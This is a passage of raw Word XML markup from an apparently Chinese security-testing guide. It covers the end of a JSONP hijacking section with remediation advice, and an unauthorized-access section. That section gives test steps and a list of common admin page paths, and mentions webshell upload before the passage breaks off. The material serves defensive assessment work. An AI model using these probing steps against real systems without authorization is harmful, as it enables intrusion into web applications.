        <w:t>网站的情况下访问了该网页时，那么用户的隐私数据（如用户名，邮箱等）可能被攻击者劫持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83C181" w14:textId="6A05B480" w:rsidR="00B00111" w:rsidRPr="00C02265" w:rsidRDefault="00C24790" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B00111" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A334ED" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00691C34" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合社会工程学，诱导用户点击某个精心构造的页面，从而达到窃取用户敏感信息的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA33813" w14:textId="77777777" w:rsidR="00B00111" w:rsidRPr="00C02265" w:rsidRDefault="00B00111" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8ED70B" w14:textId="40029463" w:rsidR="00A94615" w:rsidRPr="00C02265" w:rsidRDefault="00A94615" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可获取敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAAEBF2" w14:textId="7E6918C2" w:rsidR="00B00111" w:rsidRPr="00C02265" w:rsidRDefault="00A94615" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可获取普通数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A81DA" w14:textId="62FE7402" w:rsidR="00B00111" w:rsidRPr="00C02265" w:rsidRDefault="00B00111" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="005920E6" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议从以下几个方面进行防御：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F8D6D5" w14:textId="77777777" w:rsidR="005920E6" w:rsidRPr="00C02265" w:rsidRDefault="005920E6" w:rsidP="00C02265">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格安全的实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件：限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、部署一次性</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD07F7" w14:textId="77777777" w:rsidR="005920E6" w:rsidRPr="00C02265" w:rsidRDefault="005920E6" w:rsidP="00C02265">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式标准输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及编码（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Type : application/json; charset=utf-8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F71184" w14:textId="77777777" w:rsidR="005920E6" w:rsidRPr="00C02265" w:rsidRDefault="005920E6" w:rsidP="00C02265">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格过滤</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数名及</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里数据的输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3208A8" w14:textId="77777777" w:rsidR="008A51E6" w:rsidRPr="00C02265" w:rsidRDefault="005920E6" w:rsidP="00C02265">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格限制对</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数名的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC440FD" w14:textId="3382FDDB" w:rsidR="00B00111" w:rsidRDefault="005920E6" w:rsidP="00C02265">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出之前加入其他字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、回车换行</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样既不影响</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件加载，又能一定程度预防其他文件格式的输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F752B" w14:textId="7535C538" w:rsidR="00EF7E10" w:rsidRPr="00C02265" w:rsidRDefault="00EF7E10" w:rsidP="00EF7E10">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CFE1DFA" w14:textId="2CB5E046" w:rsidR="00B00111" w:rsidRPr="00F757E4" w:rsidRDefault="00B00111" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc498434543"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未授权访问</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="7291E439" w14:textId="4E7E7449" w:rsidR="00B00111" w:rsidRPr="009E052C" w:rsidRDefault="00B00111" w:rsidP="009E052C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="003E71BE" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未授权访问漏洞，是在攻击者没有获取到登录权限或未授权的情况下，或者不需要输入密码，即可通过直接输入网站控制台主页面地址，或者不允许查看的链接便可进行访问，同时进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED5F35" w14:textId="77777777" w:rsidR="00B00111" w:rsidRPr="009E052C" w:rsidRDefault="00B00111" w:rsidP="009E052C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F103BB" w14:textId="5E9D4398" w:rsidR="003E71BE" w:rsidRPr="009E052C" w:rsidRDefault="003E71BE" w:rsidP="009E052C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过对登录后的页面进行抓包，将抓取到的功能链接，在其他浏览器进行打开。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6A61DF" w14:textId="4E28EE88" w:rsidR="00B00111" w:rsidRPr="009E052C" w:rsidRDefault="003E71BE" w:rsidP="009E052C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描工具进行扫描，爬虫得到相关地址链接，进行直接访问，如果未进行跳转到登录页面，则可判断为存在未授权访问漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B67D1B5" w14:textId="359FED5E" w:rsidR="00B00111" w:rsidRDefault="00C24790" w:rsidP="009E052C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B00111" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者猜测管理后台地址或利用已知的访问地址，尝试在未登录的情况下直接访问，常见的后台登录地址有：</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin.jsp</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.jsp</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main.</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>left.</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>right.jsp</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top.</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>等。攻击者进入管理后台后可修改</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序设置，利用后台对上传文件过滤不严的缺陷，上传</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00D5127F" w:rsidRPr="009E052C">
        <w:rPr>
